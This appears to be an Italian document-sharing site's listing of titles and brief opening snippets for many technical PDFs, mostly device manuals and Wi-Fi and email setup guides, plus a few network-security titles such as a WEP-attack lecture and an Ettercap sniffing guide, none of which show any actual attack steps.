CHIAVETTA INTERNET ONDA MT503HSA CHIAVETTA INTERNET ONDA MT503HSA Manuale Utente Linux Debian, Fedora, Ubuntu www.ondacommunication.com Chiavet ta Internet MT503HSA Guida rapida sistema operativo LINUX V 1.1 33080, Roveredo in Piano (PN)

Dettagli

TRASMISSIONE DEL CERTIFICATO MEDICO DI MALATTIA PER ZONE NON RAGGIUNTE DA ADSL

TRASMISSIONE DEL CERTIFICATO MEDICO DI MALATTIA PER ZONE NON RAGGIUNTE DA ADSL Federazione Lavoratori Pubblici e Funzioni Pubbliche Dipartimento Studi e Legislazione 00187 ROMA Via Piave 61 sito internet: www.flp.it Email: flp@flp.it tel. 06/42000358 06/42010899 fax. 06/42010628

Dettagli

Attacchi a reti WEP. 9 Maggio 2011. Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica

Attacchi a reti WEP. 9 Maggio 2011. Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica Attacchi a reti WEP Università degli Studi di Udine Dipartimento di Ingegneria Gestionale, Elettrica e Meccanica 9 Maggio 2011 Scaletta 1 Prerequisiti RC4 Initialization vectors 2 Introduzione Uso di RC4

Dettagli

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap.

Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. Vediamo come analizzare i pacchetti in transito su una rete con uno dei più celebri sniffer di matrice italiana: Ettercap. La scelta è ricaduta su Ettercap in quanto, questo ottimo software, permette una

Dettagli

RIPETITORE WIRELESS N 300MBPS

RIPETITORE WIRELESS N 300MBPS RIPETITORE WIRELESS N 300MBPS Guida rapida all'installazione DN-70181 Introduzione: DN-70181 e un ripetitore Wi-Fi con una combinazione dispositivo di connessione di rete cablato/wireless progettato specificamente

Dettagli

SIPEM ACCESSO AL SISTEMA ED UTILIZZO DELLA CHIAVETTA DI FIRMA. Rev 1.1. Sistema Informativo Pratiche Edilizie e Monitoraggio municipale

SIPEM ACCESSO AL SISTEMA ED UTILIZZO DELLA CHIAVETTA DI FIRMA. Rev 1.1. Sistema Informativo Pratiche Edilizie e Monitoraggio municipale SIPEM Sistema Informativo Pratiche Edilizie e Monitoraggio municipale ACCESSO AL SISTEMA ED UTILIZZO DELLA CHIAVETTA DI FIRMA Rev 1.1 Il presente documento è attualmente in fase di lavorazione. Ancitel,

Dettagli

PhoneSuite Manuale dell utente. Istruzioni preliminari: installazione e primo impiego di Phone Suite

PhoneSuite Manuale dell utente. Istruzioni preliminari: installazione e primo impiego di Phone Suite PhoneSuite Manuale dell utente Istruzioni preliminari: installazione e primo impiego di Phone Suite Il software PhoneSuite può essere utilizzato direttamente da CD o essere installato sul PC. Quando si

Dettagli

Di seguito vengono elencati i passi logici che verranno affrontati dalla procedura Comunicazione Unica:

Di seguito vengono elencati i passi logici che verranno affrontati dalla procedura Comunicazione Unica: Fino ad oggi le imprese ed i loro intermediari evadevano gli obblighi riguardanti il Registro delle Imprese, l Agenzia delle Entrate, l INAIL e l INPS con procedure diverse per ogni Ente e, soprattutto,

Dettagli

GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi

GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi GUIDA PER LA CONNESSIONE ALLA RETE WIRELESS E ALL USO DEL SERVIZIO BERGAMO Wi-Fi Requisiti necessari per l utilizzo di Bergamo Wifi: - Computer/Tablet/Smartphone dotato di interfaccia wireless - Disporre

Dettagli

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 02.00 del 21.01.2014

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 02.00 del 21.01.2014 TS-CNS Tessera Sanitaria Carta Nazionale dei Servizi Versione 02.00 del 21.01.2014 - Sistema Operativo Microsoft Windows 32/64 bit - Carte Athena Per conoscere tutti i servizi della TS CNS visita il sito:

Dettagli

Istruzioni per la configurazione e l utilizzo del proprio dispositivo con il sistema Wi-Fi TM. Guglielmo

Istruzioni per la configurazione e l utilizzo del proprio dispositivo con il sistema Wi-Fi TM. Guglielmo Istruzioni per la configurazione e l utilizzo del proprio dispositivo con il sistema Wi-Fi TM Guglielmo Per poter accedere ai servizi da una Location Guglielmo occorre eseguire una serie di semplici operazioni

Dettagli

IT Security 3 LA SICUREZZA IN RETE

IT Security 3 LA SICUREZZA IN RETE 1 IT Security 3 LA SICUREZZA IN RETE Una RETE INFORMATICA è costituita da un insieme di computer collegati tra di loro e in grado di condividere sia le risorse hardware (stampanti, Hard Disk,..), che le

Dettagli

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I

La VPN con il FRITZ!Box Parte I. La VPN con il FRITZ!Box Parte I La VPN con il FRITZ!Box Parte I 1 Introduzione In questa mini-guida illustreremo come realizzare un collegamento tramite VPN(Virtual Private Network) tra due FRITZ!Box, in modo da mettere in comunicazioni

Dettagli

n-tegrity VoIP GUIDA ALL INSTALLAZIONE n-tegrity Guida alla configurazione

n-tegrity VoIP GUIDA ALL INSTALLAZIONE n-tegrity Guida alla configurazione n-tegrity VoIP GUIDA ALL INSTALLAZIONE n-tegrity Guida alla configurazione pag.2 INDICE INTRODUZIONE...3 N-Tegrity...3 System Requirements...3 INSTALLAZIONE...4 PERSONALIZZAZIONE DEL DISPOSITIVO...4 License

Dettagli

Adattatore USB LAN Wireless

Adattatore USB LAN Wireless Adattatore USB LAN Wireless AWL-300 Manuale Utente Versione 1.0 Aprile 2002 Avviso I Dichiarazione sul copyright Il presente manuale non può essere riprodotto in alcuna forma o in alcun modo, né può essere

Dettagli

Guida alla configurazione

Guida alla configurazione NovaSun Log Guida alla configurazione Revisione 3.1 28/06/2010 Partita IVA / Codice Fiscale: 03034090542 pag. 1 di 16 Partita IVA / Codice Fiscale: 03034090542 pag. 2 di 16 Contenuti Il presente documento

Dettagli

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com 2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8910W Colore: Nera Modello: FI8910W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

File, Modifica, Visualizza, Strumenti, Messaggio

File, Modifica, Visualizza, Strumenti, Messaggio Guida installare account in Outlook Express Introduzione Questa guida riguarda di sicuro uno dei programmi maggiormente usati oggi: il client di posta elettronica. Tutti, ormai, siamo abituati a ricevere

Dettagli

Guida al cracking di chiavi wep

Guida al cracking di chiavi wep Guida al cracking di chiavi wep Ciao sono h4ck3r0n3 con questa guida intendo spiegare nel lato pratico come è possibile crackare una chiave wep per mezzo di BackTrack 3 e di un asus Eeepc. In breve vi

Dettagli

SUPPORTO TECNICO AI PRODOTTI:

SUPPORTO TECNICO AI PRODOTTI: SUPPORTO TECNICO AI PRODOTTI: PROCEDURA INTEGRATA GESTIONE CONDOMINIO RENT MANAGER SERVIZIO DI ASSISTENZA CLIENTI - INSTALLAZIONE DELLA PROCEDURA SU ALTRE STAZIONI DI LAVORO - SOSTITUZIONE DEL SERVER O

Dettagli

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 04.00 del 05.09.2014

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 04.00 del 05.09.2014 TS-CNS Tessera Sanitaria Carta Nazionale dei Servizi Versione 04.00 del 05.09.2014 - Sistema operativo Windows 32bit e 64bit - Carte Siemens Per conoscere tutti i servizi della TS CNS visita il sito: www.regione.sardegna.it/tscns

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per Windows OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per Windows OS) Modello: FI8916W Colore: Nera Modello: FI8916W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

Configurazioni Mobile Connect

Configurazioni Mobile Connect Mailconnect Mail.2 L EVOLUZIONE DELLA POSTA ELETTRONICA Configurazioni Mobile Connect iphone MOBILE CONNECT CONFIGURAZIONE MOBILE CONNECT PER IPHONE CONFIGURAZIONE IMAP PER IPHONE RUBRICA CONTATTI E IPHONE

Dettagli

1.1 - Crittografia sulla infrastruttura trasmissiva tra le stazioni remote Rilheva il centro di telecontrollo

1.1 - Crittografia sulla infrastruttura trasmissiva tra le stazioni remote Rilheva il centro di telecontrollo SISTEMA DI TELECONTROLLO RILHEVA GPRS (CARATTERISTICHE DEL VETTORE GPRS E SICUREZZE ADOTTATE) Abstract: Sicurezza del Sistema di Telecontrollo Rilheva Xeo4 ha progettato e sviluppato il sistema di telecontrollo

Dettagli

Gateway KNX/DALI 64/16 GW 90872. Manuale utente del Dali Control Service and Comissioning Wizard 1.2.1

Gateway KNX/DALI 64/16 GW 90872. Manuale utente del Dali Control Service and Comissioning Wizard 1.2.1 Gateway KNX/DALI 64/16 GW 90872 Manuale utente del Dali Control Service and Comissioning Wizard 1.2.1 1 Copyright and Notes Il Dali Control Service and Comissioning Wizard 1.2.1 e la relativa documentazione

Dettagli

Manuale LiveBox WEB UTENTE. http://www.liveboxcloud.com

Manuale LiveBox WEB UTENTE. http://www.liveboxcloud.com 2015 Manuale LiveBox WEB UTENTE http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS

ROUTER WIRELESS A BANDA LARGA 11N 300MBPS ROUTER WIRELESS A BANDA LARGA 11N 300MBPS Guida all'installazione rapida DN-70591 INTRODUZIONE DN-70591 è un dispositivo combinato wireless/cablato progettato in modo specifico per i requisiti di rete

Dettagli

Backup su Server Remoto

Backup su Server Remoto Backup su Server Remoto Techsystem srl sede legale e amministrativa c.f. e p.iva: 08508960013 www.techsystem.it info@techsystem.it via parma, 64 10153 Torino cciaa di torino n 08508960013 PEC: amministrazione@pec.techsystem.it

Dettagli

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com

Manuale LiveBox WEB ADMIN. http://www.liveboxcloud.com 2014 Manuale LiveBox WEB ADMIN http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa

Dettagli

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 04.00 del 05.09.2014

TS-CNS. Tessera Sanitaria Carta Nazionale dei Servizi. Manuale di installazione e configurazione. Versione 04.00 del 05.09.2014 TS-CNS Tessera Sanitaria Carta Nazionale dei Servizi Versione 04.00 del 05.09.2014 - Sistema Operativo Microsoft Windows 32/64 bit - Carte Athena Per conoscere tutti i servizi della TS CNS visita il sito:

Dettagli

Istruzioni per la configurazione e l utilizzo del proprio dispositivo con. sistema Wi-Fi Guglielmo

Istruzioni per la configurazione e l utilizzo del proprio dispositivo con. sistema Wi-Fi Guglielmo Istruzioni per la configurazione e l utilizzo del proprio dispositivo con TM sistema Wi-Fi Guglielmo Guglielmo si occupa della realizzazione di Hot Spot pubblici per la connettività Wi-Fi in ambito pubblico

Dettagli

MANUALE D USO MA-PMX-U-SFW-101 10-10

MANUALE D USO MA-PMX-U-SFW-101 10-10 GESTIONE DEL SISTEMA EASYMIX CONNECT E RELATIVO AGGIORNAMENTO MANUALE D USO MA-PMX-U-SFW-101 10-10 Sommario LAUNCH MANAGEMENT TOOL...3 APPLICATION UPDATE...4 MODULO SYSTEM MANAGEMENT...5 LINGUA... 6 DATE

Dettagli

Posta Elettronica con Microsoft Outlook Express II

Posta Elettronica con Microsoft Outlook Express II Posta Elettronica con Microsoft Outlook Express - II Posta Elettronica con Microsoft Outlook Express II 1. Avvio di MS Outlook Express 2. Ricezione di messaggi di posta 3. Invio di messaggi di posta 4.

Dettagli

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali

CORSO EDA Informatica di base. Sicurezza, protezione, aspetti legali CORSO EDA Informatica di base Sicurezza, protezione, aspetti legali Rischi informatici Le principali fonti di rischio di perdita/danneggiamento dati informatici sono: - rischi legati all ambiente: rappresentano

Dettagli

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO

Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Configurazione del Sistema Operativo Microsoft Windows XP per accedere alla rete Wireless dedicata agli Ospiti LUSPIO Requisiti Hardware Disporre di un terminale con scheda wireless compatibile con gli

Dettagli

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)

GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) ------------------------------------------------- GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0) GUIDA UTENTE BILLIARDS COUNTER (Vers. 1.2.0)... 1 Installazione Billiards Counter... 2 Primo avvio e configurazione

Dettagli

Manuale per l utente. Outlook Connector for MDaemon

Manuale per l utente. Outlook Connector for MDaemon Outlook Connector for MDaemon Manuale per l utente Introduzione... 2 Requisiti... 2 Installazione... 3 Scaricare il plug-in Outlook Connector... 3 Installare il plug-in Outlook Connector... 4 Configurare

Dettagli

Adattatore USB LAN Wireless

Adattatore USB LAN Wireless Adattatore USB LAN Wireless AWL-400 Manuale Utente Versione 1.1 Aprile 2002 Avviso I Dichiarazione sul copyright Il presente manuale non può essere riprodotto in alcuna forma o in alcun modo, né può essere

Dettagli

GUIDA UTENTE FIDELITY MANAGER

GUIDA UTENTE FIDELITY MANAGER GUIDA UTENTE FIDELITY MANAGER (vers. 2.0.0) GUIDA UTENTE FIDELITY MANAGER (vers. 2.0.0)... 1 Installazione... 2 Prima esecuzione... 7 Login... 8 Funzionalità... 9 Gestione punti... 10 Caricare punti...

Dettagli

GESGOLF SMS ONLINE. Manuale per l utente

GESGOLF SMS ONLINE. Manuale per l utente GESGOLF SMS ONLINE Manuale per l utente Procedura di registrazione 1 Accesso al servizio 3 Personalizzazione della propria base dati 4 Gestione dei contatti 6 Ricerca dei contatti 6 Modifica di un nominativo

Dettagli

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11

Indice generale. Introduzione...xiii. Nota del revisore...xvii. Introduzione alle reti...1. Introduzione alle reti wireless...11 Introduzione...xiii Nota del revisore...xvii Capitolo 1 Capitolo 2 Introduzione alle reti...1 Trasferimento di dati... 2 Bit e byte... 2 Controllo di errore... 3 Handshaking... 3 Trovare la destinazione...

Dettagli

WebFax- manuale utente

WebFax- manuale utente WebFax- manuale utente Release 1.3 1 INTRODUZIONE... 2 1.1 Funzionamento del WebFax... 2 1.2 Caratteristiche del WebFax... 2 2 INSTALLAZIONE DEL WEBFAX... 3 2.1 Configurazione parametri di rete... 3 2.2

Dettagli

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd

IP Camera senza fili/cablata. Guida d installazione rapida (Per MAC OS) ShenZhen Foscam Tecnologia Intelligente Co., Ltd IP Camera senza fili/cablata Guida d installazione rapida (Per MAC OS) Modello: FI8918W Colore: Nera Modello: FI8918W Colore: Bianco ShenZhen Foscam Tecnologia Intelligente Co., Ltd Guida d installazione

Dettagli

DIFENDIAMO LA NOSTRA WLAN

DIFENDIAMO LA NOSTRA WLAN DIFENDIAMO LA NOSTRA WLAN Scritto da Matteo Giardino Le WLAN (Wireless Local Area Network) sono tutte quelle reti dove gli hosts (ovvero i computer che fanno parte della rete) sono collegati fra di loro

Dettagli

Corso Specialista Sistemi Ambiente Web. Test finale conoscenze acquisite - 15.12.2003. Windows 2000 Server

Corso Specialista Sistemi Ambiente Web. Test finale conoscenze acquisite - 15.12.2003. Windows 2000 Server Windows 2000 Server 1 A cosa serve il task manager? A A monitorare quali utenti stanno utilizzando una applicazione B A restringere l'accesso a task determinati da parte degli utenti C Ad interrompere

Dettagli

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link

Sicurezza nelle applicazioni multimediali: lezione 8, sicurezza ai livelli di rete e data-link. Sicurezza ai livelli di rete e data link Sicurezza ai livelli di rete e data link Sicurezza a livello applicativo Ma l utilizzo di meccanismi di cifratura e autenticazione può essere introdotto anche ai livelli inferiori dello stack 2 Sicurezza

Dettagli

Monitoraggio di outsourcer e consulenti remoti

Monitoraggio di outsourcer e consulenti remoti 1 Monitoraggio di outsourcer e consulenti remoti Un Whitepaper di Advanction e ObserveIT Daniel Petri 2 Sommario Esecutivo Nel presente whitepaper verrà mostrato come registrare le sessioni remote su gateway

Dettagli

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey

30 giorni di prova gratuiti, entra nel sito www.mypckey.com scarica e installa subito mypckey DA OGGI NON IMPORTA DOVE SEI, IL TUO PC DELL UFFICIO E SEMPRE A TUA DISPOSIZIONE! Installa solo un semplice programma (nessun hardware necessario!), genera la tua chiavetta USB, e sei pronto a prendere

Dettagli

Manuale videoconferenza da Postazione di Lavoro

Manuale videoconferenza da Postazione di Lavoro Manuale videoconferenza da Postazione di Lavoro v. 3.1 INDICE 1 ACCOUNT PORTALE DI VIDEOCONFERENZA...2 1.1 Accesso al portale...2 1.1.1 Registrazione...3 2 COME UTILIZZARE IL CLIENT DA PC PATPHONE...4

Dettagli

REGOLAMENTO PER L ACCESSO E L UTILIZZO DELLA RETE WI-FI DEL COMUNE DI FOSSALTA DI PIAVE. Approvato con Deliberazione di Giunta Comunale

REGOLAMENTO PER L ACCESSO E L UTILIZZO DELLA RETE WI-FI DEL COMUNE DI FOSSALTA DI PIAVE. Approvato con Deliberazione di Giunta Comunale REGOLAMENTO PER L ACCESSO E L UTILIZZO DELLA RETE WI-FI DEL COMUNE DI FOSSALTA DI PIAVE Approvato con Deliberazione di Giunta Comunale n. 141 del 17.12.2014 CAPO I PRINCIPI GENERALI, FINALITA E AMBITO

Dettagli

Guida Utente PS Contact Manager GUIDA UTENTE

Guida Utente PS Contact Manager GUIDA UTENTE GUIDA UTENTE Installazione...2 Prima esecuzione...5 Login...7 Registrazione del programma...8 Inserimento clienti...9 Gestione contatti...11 Agenti...15 Archivi di base...16 Installazione in rete...16

Dettagli

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO CLSMS SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO Sommario e introduzione CLSMS SOMMARIO INSTALLAZIONE E CONFIGURAZIONE... 3 Parametri di configurazione... 4 Attivazione Software...

Dettagli

Manuale LiveBox CLIENT DESKTOP (WINDOWS)

Manuale LiveBox CLIENT DESKTOP (WINDOWS) 2015 Manuale LiveBox CLIENT DESKTOP (WINDOWS) LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di

Dettagli

Manuale Utente del Portale CA per il Titolare di Carta SISS

Manuale Utente del Portale CA per il Titolare di Carta SISS - Carta SISS Manuale Utente del Portale CA per il Titolare di Carta SISS Codice del Documento: CRS-CA-MES#02 Revisione del Documento: 1.0 Data di Revisione: 05-09-2014 Page 1 of 28 Cronologia delle Revisioni

Dettagli

Installare e configurare la CO-CNS

Installare e configurare la CO-CNS CO-CNS Carta Operatore Carta Nazionale dei Servizi Versione 01.00 del 21.10.2013 Sistema Operativo Microsoft Windows 32/64 bit Per conoscere tutti dettagli della CO-CNS, consulta l Area Operatori sul sito

Dettagli

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC

BMSO1001. Virtual Configurator. Istruzioni d uso 02/10-01 PC BMSO1001 Virtual Configurator Istruzioni d uso 02/10-01 PC 2 Virtual Configurator Istruzioni d uso Indice 1. Requisiti Hardware e Software 4 1.1 Requisiti Hardware 4 1.2 Requisiti Software 4 2. Concetti

Dettagli

Guida applicativa - Print Server. Rev: 2.0.0 1910010857

Guida applicativa - Print Server. Rev: 2.0.0 1910010857 Guida applicativa - Print Server Rev: 2.0.0 1910010857 Indice dei contenuti Introduzione... 1 Installazione su Windows 8/7/Vista/XP... 1 Utilizzo su Windows 8/7/Vista/XP... 6 Controller... 6 Stampa...

Dettagli

Guida in linea di Symantec pcanywhere Web Remote

Guida in linea di Symantec pcanywhere Web Remote Guida in linea di Symantec pcanywhere Web Remote Connessione da un browser Web Il documento contiene i seguenti argomenti: Informazioni su Symantec pcanywhere Web Remote Metodi per la protezione della

Dettagli

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Guida al servizio wireless dell'univda

Guida al servizio wireless dell'univda Guida al servizio wireless dell'univda Versione 1.0 Autore Ufficio Sistemi Informativi di Ateneo Data 04/03/2013 Distribuito a: Studenti - Docenti - Amministrativi Sommario Introduzione... 1 1. Modalità

Dettagli

Petra VPN 2.7. Guida Utente

Petra VPN 2.7. Guida Utente Petra VPN 2.7 Guida Utente Petra VPN 2.7: Guida Utente Copyright 1996, 2001 Link s.r.l. (http://www.link.it) Questo documento contiene informazioni di proprietà riservata, protette da copyright. Tutti

Dettagli

L ambiente mobile. Ing. Gianfranco Pontevolpe. Centro Nazionale per l Informatica nella Pubblica Amministrazione. Programma

L ambiente mobile. Ing. Gianfranco Pontevolpe. Centro Nazionale per l Informatica nella Pubblica Amministrazione. Programma L ambiente mobile Ing. Gianfranco Pontevolpe Centro Nazionale per l Informatica nella Pubblica Amministrazione Programma I sistemi cellulari Lo standard GSM I problemi di sicurezza del GSM Lo standard

Dettagli

Smart Guide ITALIANO. Versione: 3.2.5. netrd. etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart.

Smart Guide ITALIANO. Versione: 3.2.5. netrd. etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart. Smart Guide netrd ITALIANO Versione: 3.2.5 netrd è commercializzato da etstart srl via Austria, 23/D - 35127 Padova (PD), Italy - info@etstart.it - www.etstart.it 1 1 Descrizione Prodotto INDICE 1.1 Informazioni

Dettagli

ALICE. Manuale d uso

ALICE. Manuale d uso ALICE Manuale d uso Indice 1 INTRODUZIONE INDICE 2 1 INTRODUZIONE 3 2 REQUISITI DI SISTEMA 3 3 INSTALLAZIONE 4 3.1 Operazioni preliminari 4 3.2 Installazione di Alice 4 4 6 4.1 Avvio di Alice 6 4.2 Connessione

Dettagli

DWL-122 Adattatore USB Wireless a 2.4GHz

DWL-122 Adattatore USB Wireless a 2.4GHz Il presente prodotto funziona con I seguenti sistemi operativi: Windows XP, Windows 2000, Windows Me, Windows 98SE, Macintosh OS X (10.2.x o superiore) Prima di cominiciare Il Computer Windows deve avere

Dettagli

Videoregistratori Serie DH

Videoregistratori Serie DH Pagina:1 DVR per telecamere analogiche, 960H, HD-SDI Manuale programma ViewCam Come installare e utilizzare l App per dispositivi mobili Pagina:2 Contenuto del manuale In questo manuale viene descritto

Dettagli

Descrizione del Sistema TLOG-Commander per la gestione della protezione catodica.

Descrizione del Sistema TLOG-Commander per la gestione della protezione catodica. Descrizione del Sistema TLOG-Commander per la gestione della protezione catodica. Il sistema proposto è composto da un Centro operativo di raccolta dati dotato del software Commander e dai logger TLOG

Dettagli